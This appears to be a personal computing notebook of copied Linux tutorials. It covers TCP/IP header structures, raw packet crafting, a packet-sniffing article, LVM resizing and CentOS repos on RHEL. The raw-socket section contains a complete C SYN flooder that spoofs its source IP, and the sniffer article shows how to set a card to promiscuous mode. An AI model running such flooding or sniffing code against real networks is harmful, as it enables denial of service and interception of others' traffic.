The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits)

struct ipheader { unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */ unsigned char ip_tos; unsigned short int ip_len; unsigned short int ip_id; unsigned short int ip_off; unsigned char ip_ttl; unsigned char ip_p; unsigned short int ip_sum; unsigned int ip_src; unsigned int ip_dst;}; /* total ip header length: 20 bytes (=160 bits) */

The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.

ip_hl: the ip header length in 32bit octets. this means a value of 5 for the hl means 20 bytes (5 * 4). values other than 5 only need to be set it the ip header contains options (mostly used for routing)ip_v: the ip version is always 4 (maybe I'll write a IPv6 tutorial later;)ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes.ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID.ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off |= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits is the fragment offset, containing the number of 8-byte big packets already sent.ip_ttl: time to live is the amount of hops (routers to pass) before the packet is discarded, and an icmp error message is returned. the maximum is 255.ip_p: the transport layer protocol. can be tcp (6), udp(17), icmp(1), or whatever protocol follows the ip header. look in /etc/protocols for more.ip_sum: the datagram checksum for the whole ip datagram. every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router. see V. for a checksum function.ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). both can be chosen arbitrarily.

Page 157: Appunti Informatica

IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer.

struct icmpheader { unsigned char icmp_type; unsigned char icmp_code; unsigned short int icmp_cksum; /* The following data structures are ICMP type specific */ unsigned short int icmp_id; unsigned short int icmp_seq;}; /* total icmp header length: 8 bytes (=64 bits) */

icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in for all the types.icmp_code: this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more.icmp_cksum: the checksum for the icmp header + data. same as the IP checksum. Note: The next 32 bits in an icmp packet can be used in many different ways. This depends on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex.icmp_id: used in echo request/reply messages, to identify the requesticmp_seq: identifies the sequence of echo messages, if more than one is sent.

The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers.

struct udpheader { unsigned short int uh_sport; unsigned short int uh_dport; unsigned short int uh_len; unsigned short int uh_check;}; /* total udp header length: 8 bytes (=64 bits) */

uh_sport: The source port that a client bind()s to, and the contacted server will reply back to in order to direct his responses to the client.uh_dport: The destination port that a specific server can be contacted on.uh_len: The length of udp header and payload data in bytes.uh_check: The checksum of header and data, see IP checksum.

The Transmission Control Protocol is the mostly used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)

struct tcpheader { unsigned short int th_sport; unsigned short int th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_x2:4, th_off:4; unsigned char th_flags; unsigned short int th_win; unsigned short int th_sum; unsigned short int th_urp;}; /* total tcp header length: 20 bytes (=160 bits) */

Page 158: Appunti Informatica

th_sport: The source port, which has the same function as in UDP.th_dport: The destination port, which has the same function as in UDP.th_seq: The sequence number is used to enumerate the TCP segments. The data in a TCP connection can be contained in any amount of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random.th_ack: Every packet that is sent and a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the th_ack field containing the previous the_seq number.th_x2: This is unused and contains binary zeroes.th_off: The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5.th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3... TH_URG: Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using telnet protocol). TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.). TH_PSH: Push. The systems IP stack will not buffer the segment and forward it to the application immediately (mostly used with telnet). TH_RST: Reset. Tells the peer that the connection has been terminated. TH_SYN: Synchronization. A segment with the SYN flag set indicates that client wants to initiate a new connection to the destination port. TH_FIN: Final. The connection should be closed, the peer is supposed to answer with one last segment with the FIN flag set as well.th_win: Window. The amount of bytes that can be sent before the data should be acknowledged with an ACK before sending more segments.th_sum: The checksum of pseudo header, tcp header and payload. The pseudo is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment.th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.

Page 159: Appunti Informatica

III. Building and injecting datagrams

Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s).  We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (Syn flooder).

#define __USE_BSD /* use bsd'ish ip header */#include /* these headers are for a Linux system, but */#include /* the names on other systems are easy to guess.. */#include #define __FAVOR_BSD /* use bsd'ish tcp header */#include #include

#define P 25 /* lets flood the sendmail port */

unsigned short /* this function generates header checksums */csum (unsigned short *buf, int nwords){ unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum;}

int main (void){ int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */ char datagram[4096]; /* this buffer will contain ip header, tcp header,

and payload. we'll point an ip header structure at its beginning, and a tcp header structure after that to write the header values into it */

struct ip *iph = (struct ip *) datagram; struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip); struct sockaddr_in sin;

/* the sockaddr_in containing the dest. address is used in sendto() to determine the datagrams path */

sin.sin_family = AF_INET; sin.sin_port = htons (P);/* you byte-order >1byte header values to network

byte order (not needed on big endian machines) */ sin.sin_addr.s_addr = inet_addr ("127.0.0.1");

memset (datagram, 0, 4096); /* zero out the buffer */

/* we'll now fill in the ip/tcp header values, see above for explanations */ iph->ip_hl = 5; iph->ip_v = 4; iph->ip_tos = 0; iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */ iph->ip_id = htonl (54321); /* the value doesn't matter here */ iph->ip_off = 0; iph->ip_ttl = 255; iph->ip_p = 6; iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */ iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */ iph->ip_dst.s_addr = sin.sin_addr.s_addr; tcph->th_sport = htons (1234); /* arbitrary port */

Page 160: Appunti Informatica

tcph->th_dport = htons (P); tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */ tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */ tcph->th_x2 = 0; tcph->th_off = 0; /* first and only tcp segment */ tcph->th_flags = TH_SYN; /* initial connection request */ tcph->th_win = htonl (65535); /* maximum allowed window size */ tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack

should fill in the correct checksum during transmission */ tcph->th_urp = 0;

iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);

/* finally, it is very advisable to do a IP_HDRINCL call, to make sure that the kernel knows the header is included in the data, and doesn't insert its own header into the packet before our data */

{ /* lets do it the ugly way.. */ int one = 1; const int *val = &one; if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) printf ("Warning: Cannot set HDRINCL!\n"); }

while (1) { if (sendto (s, /* our socket */

datagram, /* the buffer containing headers and data */ iph->ip_len, /* total length of our datagram */ 0, /* routing flags, normally always 0 */ (struct sockaddr *) &sin, /* socket addr, just like in */ sizeof (sin)) < 0) /* a normal send() */

printf ("error\n"); else

printf ("."); }

return 0;}

IV. Basic transport layer operations

To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction into the most important operations in the IP stack.  To learn more about the behavior of the protocols, one option is to exame the source for your systems IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/.  The most important protocol, of course, is TCP, on which I will focus on.

Connection initiation: to contact an udp or tcp server listening on port 1234, the client calls a connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the systems IP stack will select one it'll bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: servers address, TCP/UDP src: clients source port, TCP/UDP dest: port 1234.  If a client is located on port 1234 on the destination host, it will reply back with a datagram containing: IP src: server IP dst: client srcport: server port dstport: clients source port.  If there is no server located on the host, an ICMP type unreach message is created, subcode "Connection refused". The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out.

TCP initiation ("3-way handshake") and connection: The client will do a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number and the acknowledgement number the original sequence. Finally, the client replies back with a tcp datagram with the ACK flag set, and the server's ack sequence incremented by one. Once the connection is established, each tcp segment will be sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the

Page 161: Appunti Informatica

amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement, a tcp segment with the ACK flag set and the ack sequence number the one of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, desynchronized, bad sequence numbers, etc.) the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection.

The Linux Socket Filter: Sniffing Bytes over the Network (Linux C++)

From: http://www.linuxjournal.com/article/4659

A feature added to the kernel with the 2.2 release, this LSF can be programmed to let the kernel decide to which packets access should be granted. Here's how.

If you deal with network administration or security management, or if you are merely curious about what is passing by over your local network, grabbing some packets off the network card can be a useful exercise. With a little bit of C coding and a basic knowledge of networking, you will be able to capture data even if it is not addressed to your machine. In this article, we will refer to Ethernet networks, by far the most widespread LAN technology. Also, for reasons that will be explained later, we will assume that source and destination hosts belong to the same LAN.

First off, we will briefly recall how a common Ethernet network card works. Those of you who are already skilled in this field may safely skip to the next paragraph. IP packets sourced from users' applications are encapsulated into Ethernet frames (this is the name given to packets when sent over an Ethernet segment), which are just bigger lower-level packets containing the original IP packet and some information needed to carry it to its destination (see Figure 1). In particular, the destination IP address is mapped to a 6-byte destination Ethernet address (often called MAC address) through a mechanism called ARP. Thus, the frame containing the packet travels from the source host to the destination host over the cable that connects them. It is likely that the frame will go through network devices such as hubs and switches, but since we assumed no LAN borders are crossed, no routers or gateways will be involved.

Figure 1. IP Packets as Ethernet Frames

No routing process happens at the Ethernet level. In other words, the frame sent by the source host will not be headed directly toward the destination host; instead, the frame will be copied over all the cables that make up the LAN, and all the network cards will see it passing (see Figure 2). Each network card will start reading the first six bytes of the frame (which happen to contain the above-mentioned destination MAC addresses), but only one card will recognize its own address in the destination field and will pick up the frame. At this point, the frame will be taken apart by the network driver and the original IP packet will be recovered and passed up to the receiving application through the network protocol stack.

Page 162: Appunti Informatica

Figure 2. Sending Ethernet Frames over the LAN

More precisely, the network driver will have a look at the Protocol Type field inside the Ethernet frame header (see Figure 1) and, based on that value, forward the packet to the appropriate protocol receiving function. Most of the time the protocol will be IP, and the receiving function will take off the IP header and pass the payload up to the UDP- or TCP-receiving functions. These protocols, in turn, will pass it to the socket-handling functions, which will eventually deliver packet data to the receiving application in userland. During this trip, the packet loses all network information related to it, such as the source addresses (IP and MAC) and port, IP options, TCP parameters and so on. Furthermore, if the destination host does not have an open socket with the correct parameters, the packet will be discarded and never make it to the application level.

As a consequence, we have two distinct issues in sniffing packets over the network. One is related to Ethernet addressing—we cannot read packets that are not destined to our host; the other is related to protocol stack processing—in order for the packet not to be discarded, we should have a listening socket for each and every port. Furthermore, part of the packet information is lost during protocol stack processing.

The first issue is not fundamental, since we may not be interested in other hosts' packets and may tend to sniff all the packets directed to our machine. The second one, however, must be solved. We will see how to address these issues separately, starting with the latter.

The PF_PACKET Protocol

When you open a socket with the standard call sock = socket(domain, type, protocol) you have to specify which domain (or protocol family) you are going to use with that socket. Commonly used families are PF_UNIX, for communications bounded on the local machine, and PF_INET, for communications based on IPv4 protocols. Furthermore, you have to specify a type for your socket and possible values depend on the family you specified. Common values for type, when dealing with the PF_INET family, include SOCK_STREAM (typically associated with TCP) and SOCK_DGRAM (associated with UDP). Socket types influence how packets are handled by the kernel before being passed up to the application. Finally, you specify the protocol that will handle the packets flowing through the socket (more details on this can be found on the socket(3) man page).

In recent versions of the Linux kernel (post-2.0 releases) a new protocol family has been introduced, named PF_PACKET. This family allows an application to send and receive packets dealing directly with the network card driver, thus avoiding the usual protocol stack-handling (e.g., IP/TCP or IP/UDP processing). That is, any packet sent through the socket will be directly passed to the Ethernet interface, and any packet received through the interface will be directly passed to the application.

Page 163: Appunti Informatica

The PF_PACKET family supports two slightly different socket types, SOCK_DGRAM and SOCK_RAW. The former leaves to the kernel the burden of adding and removing Ethernet level headers. The latter gives the application complete control over the Ethernet header. The protocol field in the socket() call must match one of the Ethernet IDs defined in /usr/include/linux/if_ether.h, which represents the registered protocols that can be shipped in an Ethernet frame. Unless dealing with very specific protocols, you typically use ETH_P_IP, which encompasses all of the IP-suite protocols (e.g., TCP, UDP, ICMP, raw IP and so on).

Since they have pretty serious security implications (for example, you may forge a frame with a spoofed MAC address), PF_PACKET-family sockets may only be used by root.

The PF_PACKET family easily solves the problem associated with protocol stack-handling of our sniffed packets. Let's see it do so with the example in Listing 1. We open a socket belonging to the PF_PACKET family, specifying a SOCK_RAW socket type and IP-related protocol type. Then we start reading from the socket and, after a few sanity checks, we print out some information extracted from the Ethernet level and IP level headers. By cross-checking the printed addresses with the offsets in Figure 1, you will see how easy it is for the application to get access to network level data.

Listing 1. Protocol Stack-Handling Sniffed Packets

Assuming that your machine is connected to an Ethernet LAN, you can experiment with our short example by running it while generating packets directed to your host from another machine (you can ping or Telnet to your host). You will be able to see all the packets directed to you, but you will not see any packet headed toward other hosts.

Promiscuous vs. Nonpromiscuous Mode

The PF_PACKET family allows an application to retrieve data packets as they are received at the network card level, but still does not allow it to read packets that are not addressed to its host. As we have seen before, this is due to the network card discarding all the packets that do not contain its own MAC address—an operation mode called nonpromiscuous, which basically means that each network card is minding its own business and reading only the frames directed to it. There are three exceptions to this rule: a frame whose destination MAC address is the special broadcast address (FF:FF:FF:FF:FF:FF) will be picked up by any card; a frame whose destination MAC address is a multicast address will be picked up by cards that have multicast reception enabled and a card that has been set in promiscuous mode will pick up all the packets it sees.

The last case is, of course, the most interesting one for our purposes. To set a network card to promiscuous mode, all we have to do is issue a particular ioctl() call to an open socket on that card. Since this is a potentially security-threatening operation, the call is only allowed for the root user. Supposing that “sock” contains an already open socket, the following instructions will do the trick:

strncpy(ethreq.ifr_name,"eth0",IFNAMSIZ);ioctl(sock, SIOCGIFFLAGS, &ethreq);ethreq.ifr_flags |= IFF_PROMISC;ioctl(sock, SIOCSIFFLAGS, &ethreq);

(where ethreq is an ifreq structure, defined in /usr/include/net/if.h). The first ioctl reads the current value of the Ethernet card flags; the flags are then ORed with IFF_PROMISC, which enables promiscuous mode and are written back to the card with the second ioctl.

Let's see it in a more complete example (see Listing 2 at ftp://ftp.ssc.com/pub/lj/listings/issue86/). If you compile and run it as root on a machine connected to a LAN, you will be able to see all the packets flowing on the cable, even if they are not for your host. This is because your network card is now working in promiscuous mode. You can easily check it out by giving the ifconfig command and observing the third line in the output.

Page 164: Appunti Informatica

Note that if your LAN uses Ethernet switches instead of hubs, you will see only packets flowing in the switch's branch you belong to. This is due to the way switches work, and there is very little you can do about it (except for deceiving the switch with MAC address-spoofing, which is outside the scope of this article). For more information on hubs and switches, please have a look at the articles cited in the Resources section.

The Linux Packet Filter

All our sniffing problems seem to be solved right now, but there is still one important thing to consider: if you actually tried the example in Listing 2, and if your LAN serves even a modest amount of traffic (a couple of Windows hosts will be enough to waste some bandwidth with a good number of NETBIOS packets), you will have noticed our sniffer prints out too much data. As network traffic increases, the sniffer will start losing packets since the PC will not be able to process them quickly enough.

The solution to this problem is to filter the packets you receive, and print out information only on those you are interested in. One idea would be to insert an “if statement” in the sniffer's source; this would help polish the output of the sniffer, but it would not be very efficient in terms of performance. The kernel would still pull up all the packets flowing on the network, thus wasting processing time, and the sniffer would still examine each packet header to decide whether to print out the related data or not.

The optimal solution to this problem is to put the filter as early as possible in the packet-processing chain (it starts at the network driver level and ends at the application level, see Figure 3). The Linux kernel allows us to put a filter, called an LPF, directly inside the PF_PACKET protocol-processing routines, which are run shortly after the network card reception interrupt has been served. The filter decides which packets shall be relayed to the application and which ones should be discarded.

Figure 3. Packet-Processing Chain

In order to be as flexible as possible, and not to limit the programmer to a set of predefined conditions, the packet-filtering engine is actually implemented as a state machine running a user-defined program. The program is written in a specific pseudo-machine code language called BPF (for Berkeley packet filter), inspired by an old paper written by Steve McCanne and Van Jacobson (see Resources). BPF actually looks like a real assembly language with a couple of registers and a few instructions to load and store values, perform arithmetic operations and conditionally branch.

The filter code is run on each packet to be examined, and the memory space into which the BPF processor operates are the bytes containing the packet data. The result of the filter is an integer number that specifies how many bytes of the packet (if any) the socket should pass to the application level. This is a further advantage, since often you are interested in just the first few bytes of a packet, and you can spare processing time by avoiding copying the excess ones.

Page 165: Appunti Informatica

(Not) Programming the Filter

Even if the BPF language is pretty simple and easy to learn, most of us would probably be more comfortable with filters written in human-readable expressions. So, instead of presenting the details and instructions of the BPF language (which you can find in the above-mentioned paper), we will discuss how to obtain the code for a working filter starting from a logic expression.

First, you will need to install the tcpdump program from LBL (see Resources). But, if you are reading this article, it is likely that you already know and use tcpdump. The first versions were written by the same people who wrote the BPF paper and its first implementation. In fact, tcpdump uses BPF, in the form of a library called libpcap, to capture and filter packets. The library is an OS-independent wrapper for the BPF engine. When used on Linux machines, BPF functions are carried out by the Linux packet filter.

One of the most useful functions provided by the libpcap is pcap_compile(), which takes a string containing a logic expression as input and outputs the BPF filter code. tcpdump uses this function to translate the command-line expression passed by the user into a working BPF filter. What is interesting for our purposes is that tcpdump has a seldomly used switch, -d, which prints the code of the filter.

For example, typing tcpdump host 192.168.9.10 will start sniffing and grab only those packets whose source or destination IP address matches 192.168.9.10. Typing tcpdump -d host 192.168.9.10 will print the BPF code that recognizes the filter, as shown in Listing 3.

Listing 3. Tcpdump -d Results

Let's briefly comment on this code; lines 0-1 and 6-7 verify that the captured frame is actually transporting IP, ARP or RARP protocols by comparing their protocol IDs (see /usr/include/linux/if_ether.h) with the value found at offset 12 in the frame (see Figure 1). If the test fails, the packet is discarded (line 13).

Lines 2-5 and 8-11 compare the source and destination IP addresses with 192.168.9.10. Note that, depending on the protocol, the offsets of these addresses are different; if the protocol is IP, they are 26 and 30, otherwise they are 28 and 38. If one of the addresses matches, the packet is accepted by the filter, and the first 68 bytes are passed to the application (line 12).

The filter code is not always optimized, since it is generated for a generic BPF machine and not tailored to the specific architecture that runs the filter engine. In the particular case of the LPF, the filter is run by the PF_PACKET processing routines, which may have already checked the Ethernet protocol. This depends on the protocol field you specified in the initial socket() call: if it is not ETH_P_ALL (which means that every Ethernet frame shall be captured), then only frames having the specified Ethernet protocol will arrive at the filter. For example, in the case of an ETH_P_IP socket, we could rewrite a faster and more compact filter as follows:

(000) ld [26](001) jeq #0xc0a8090a jt 4 jf 2(002) ld [30](003) jeq #0xc0a8090a jt 4 jf 5(004) ret #68(005) ret #0

Installing the Filter

Installing an LPF is a straightforward operation: all you have to do is create a sock_filter structure containing the filter and attach it to an open socket.

The filter structure is easily obtained by substituting the -d switch to tcpdump with -dd. The filter will be printed as a C array that you can copy and paste into your code, as shown in Listing 4. Afterward, you attach the filter to the socket by simply issuing a setsockopt() call.

Page 166: Appunti Informatica

Listing 4. Tcpdump with --dd Switch

A Complete Example

We will conclude this article with a complete example (see Listing 5 at ftp://ftp.ssc.com/pub/lj/listings/issue86/). It is exactly like the first two examples, with the addition of the LSF code and the setsockopt() call. The filter has been configured to select only UDP packets, having either source or destination IP address 192.168.9.10 and source UDP port equal to 5000.

In order to test this listing, you will need a simple way to generate arbitrary UDP packets (such as sendip or apsend, found on http://freshmeat.net/). Also, you may want to adapt the IP address to match the ones used in your own LAN. To accomplish this, just substitute 0xc0a8090a in the filter code with the IP address of your choice in hex notation.

A final remark concerns the status of the Ethernet card when you exit the program. Since we did not reset the Ethernet flags, the card will remain in promiscuous mode. To solve this problem, all you need to do is install a Control-C (SIGINT) signal handler that resets the Ethernet flags to their previous value (which you will have saved just before ORing with IFF_PROMISC) before exiting the program.

Conclusions

Sniffing packets over your LAN is an invaluable tool for debugging network problems or collecting measurements. Sometimes the commonly available tools, such as tcpdump or ethereal, will not exactly fit your needs and writing your own sniffer can be of great help. Thanks to the LPF, you can do this in a simple and efficient way.

Page 167: Appunti Informatica

Coding for cross platform deployment with gcc/g++: (Linux C++)

http://www.yolinux.com/TUTORIALS/LinuxTutorialC++.html

The gcc/g++ compiler is compiled with a number of defined preprocessor variables. The list of defined variables compiled into gcc/g++ can be viewed by issuing the command: g++ -dumpspecs

The defined preprocessor variables can then be used to handle platform dependencies.

PlatformPlatform Variable

NameVariable:

unixVariable: posix

Variable: _POSIX_SOURCE

Architecture variable

GCC: RHEL/Fedora Linux

linux__gnu_linux__

* *__i386____x86_64__

Red Hat 8 Linuxlinux__gnu_linux__

* * *

Suse 9.2 Linuxlinux__gnu_linux__

*

Sun Solaris/SPARC sparc __arch64

SGI IRIX/MIPS sgi * _SGI_SOURCEmipshost_mips

Cygwin Win/Intel-32__CYGWIN32WIN32

* * _X86_

Example C/C++ source code 1:

#ifdef sparc...#endif#ifdef linux...#endif#ifdef __CYGWIN32...#endif...#if defined(linux) || defined(sparc)...#endif...

Example C/C++ source code 2: #ifdef sgi return fn_sgi();#elif defined(__CYGWIN32) return fn_win();#elif defined(linux) return fn_linux();#else struct time ts; return fn_time();#endif...

OR

#ifdef sgi #include file_sgi.h#elif defined(sparc) #include file_sparc.h#elif defined(linux) #include file_linux.h#else #error Unknown OS type#endif...

Note use of the "#error" for error processing.

Page 168: Appunti Informatica

Giving a user access to another user's home directory (Linux)

Creare un gruppo:

# groupadd developers

Aggiungere l’utente al gruppo

Add existing user tony to ftp supplementary/secondary group with usermod command using -a option ~ i.e. add the user to the supplemental group(s). Use only with -G option :

# usermod -a -G developers tony

Change existing user tony primary group to www:

# usermod -g developers tony

Ensure that user added properly to group developers:# id vivek

Output:

uid=1122(vivek) gid=1125(vivek) groups=1125(vivek),1124(developers)

You could also create a group (example: developers), add the new user to it, use Code:

chgrp developers <user's home directory>

, then change the permissions to give the new group full access with Code:

chmod 775 <user's home directory>

Page 169: Appunti Informatica

Resizing LVMs (Linux)

LVM is a disk allocation technique that supplements or replaces traditional partitions. In an LVM configuration, one or more partitions, or occasionally entire disks, are assigned as physical volumes in avolume group, which in turn is broken down into logical volumes. File systems are then created on logical volumes, which are treated much like partitions in a conventional configuration. This approach to disk allocation adds complexity, but the benefit is flexibility. An LVM configuration makes it possible to combine disk space from several small disks into one big logical volume. More important for the topic of partition resizing, logical volumes can be created, deleted, and resized much like files on a file system; you needn't be concerned with partition start points, only with their absolute size.

Note: I don't attempt to describe how to set up an LVM in this article. If you don't already use an LVM configuration, you can convert your system to use one, but you should consult other documentation, such as the Linux LVM HOWTO (see Resources), to learn how to do so.

Resizing physical volumes

If you've resized non-LVM partitions, as described in Part 1 of this series, and want to add the space to your LVM configuration, you have two choices:

You can create a new partition in the empty space and add the new partition to your LVM. You can resize an existing LVM partition, if it's contiguous with the new space.

Unfortunately, the GParted (also known as Gnome Partition Editor) tool described in Part 1 of this series does not support resizing LVM partitions. Therefore, the easiest way to add space to your volume group is to create a new partition in the free space and add it as a new physical volume to your existing volume group.

Although GParted can't directly create an LVM partition, you can do so with one of the following tools:

parted (text-mode GNU Parted) fdisk for Master Boot Record (MBR) disks gdisk for globally unique identifier (GUID) Partition Table (GPT) disks

If you use parted, you can use the set command to turn on the lvm flag, as in set 1 lvm on to flag partition 1 as an LVM partition. Using fdisk, you should use the t command to set the partition's type code to 8e. You do the same with gdisk, except that its type code for LVM partitions is 8e00.

In any of these cases, you must use the pvcreate command to set up the basic LVM data structures on the partition and then vgextend to add the partition to the volume group. For instance, to add /dev/sda1 to the existing MyGroup volume group, you type the following commands:

pvcreate /dev/sda1

vgextend MyGroup /dev/sda1

With these changes finished, you should be able to extend the logical volumes in your volume group, as described shortly.

Resizing logical volumes

For file systems, resizing logical volumes can be simpler than resizing partitions because LVM obviates the need to set aside contiguous sets of numbered sectors in the form of partitions. Resizing the logical volume itself is accomplished by means of the lvresize command. This command takes a number of options (consult its man page for details), but the most important is -L, which takes a new size or a change in size, a change being denoted by a leading plus (+) or minus (-) sign. You must also offer a path to the logical volume. For instance, suppose you want to add 5 gibibytes (GiB) to the size of the usr logical volume in the MyGroup group. You could do so as follows:

Page 170: Appunti Informatica

lvresize -L +5G /dev/mapper/MyGroup-usr

This command adjusts the size of the specified logical volume. Keep in mind, however, that this change is much like a change to a partition alone. That is, the size of the file system contained in the logical volume is not altered. To adjust the file system, you must use a file system-specific tool, such as resize2fs, resizereiserfs, xfs_growfs, or the resize mount option when mounting Journaled File System (JFS). When used without size options, these tools all resize the file system to fill the new logical volume size, which is convenient when growing a logical volume.

If you want to shrink a logical volume, the task is a bit more complex. You must first resize the file system (using resize2fs or similar tools) and then shrink the logical volume to match the new size. Because of the potential for a damaging error should you accidentally set the logical volume size too small, I recommend first shrinking the file system to something significantly smaller than your target size, then resizing the logical volume to the correct new size, and then resizing the file system again to increase its size, relying on the auto-sizing feature to have the file system exactly fill the new logical volume size.

Remember also that, although you can shrink most Linux-native file systems, you can't shrink XFS or JFS. If you need to shrink a logical volume containing one of these file systems, you may have to create a new smaller logical volume, copy the first one's contents to the new volume, juggle your mount points, and then delete the original. If you lack sufficient free space to do this, you may be forced to use a backup as an intermediate step.

Procedura effettutata utilizando la distro parted magic :

Creata una partione ext2 /dev/sda2 nello spazio unallocato

pvcreate /dev/sda2

vgextend /dev/Volgroup00 /dev/sda2

vgdisply e vldisplay per vedere se tutto è apposto.

e2fsck -f /dev/VolGroup00/LogVol00

resize2fs /dev/VolGroup00/LogVol00

Per resizare il tutto.(provare con un mount se è tutto ok)

Page 171: Appunti Informatica

Installare CENTOS5 REPO su RED HAT 5

Settare il proxy:export http_proxy=http://10.140.4.220:81export ftp_proxy=http://10.140.4.220:81

Prendere la GPG-key:wget http://mirror.centos.org/centos/ RPM - GPG - KEY - CentOS - 5

Importrla:rpm –import RPM - GPG - KEY - CentOS - 5

Copiarla in:/etc/pki/rpm-gpg

Creare:/etc/yum.repos.d/centos5.repo

Contenente:[centos5]name = CentOS-$releasever - Basebaseurl = http://mirror.centos.org/centos/5/os/$basearchgpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-5#gpgkey = http://ATrpms.net/RPM-GPG-KEY.atrpmsgpgcheck = 1

Fatto.

Usare CENTOS repository in RHEL [better] (Linux)

Abilitare il proxy:

Better answer - use /etc/profile.d/proxy.[csh,sh]

create the following files in /etc/profile.d, and then this will work in *any* shell for *any* user of the system

#proxy.shexport http_proxy=http://host.com:port/export ftp_proxy=http://host.com:port/export no_proxy=.domain.comexport HTTP_PROXY=http://host.com:port/export FTP_PROXY=http://host.com:port/

#proxy.cshsetenv http_proxy http://host.com:port/setenv ftp_proxy http://host.com:port/setenv no_proxy .domain.comsetenv HTTP_PROXY http://host.com:port/setenv FTP_PROXY http://host.com:port/

(10.140.4.220:81)

download the public key fromhttp://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

(wget http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5)

rpm --import RPM-GPG-KEY-CentOS-5

Page 172: Appunti Informatica

(oppure rpm --import --httpproxy $httpproxy --httpport $httpport –import http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5)Creare un file centos.repo in /etc/yum.repos.d/(Se si usa il vault si hanno tutte le versioni CENTOS )

[base]name=Red Hat Linux - Basebaseurl=http://vault.centos.org/5.3/os/i386enabled = 1gpgcheck=1gpgkey=file://etc/yum/RPM-GPG-KEY-CentOS-5priority=1

Non sò se và fatto ma alcuni siti riportano di: ( io l’ho fatto )

http://jyrxs.blogspot.it/2008/02/using-centos-5-repos-in-rhel5-server.html

Tuesday, February 19, 2008

Using CentOS 5 Repos in RHEL 5 Server

1. Remove "yum-rhn-plugin" package from RHEL, this is used to check the activation in RHEL.

# rpm -e yum-rhn-plugin

2. Remove the "redhat-release" related packages, this is used to check the repositories compatibility.

usually we can't remove these packages because they are used by other packages of the system for

proper fuctioning. so we'll use the "--nodeps" parameter to forcely remove them from the system.

# rpm -e redhat-release-notes-5Server redhat-release-5Server --nodeps

3. Download & install the "centos-release" relates packages, to fill in the gap that we made by

removing the "redhat-release"related packages.

i386 (32 bit)

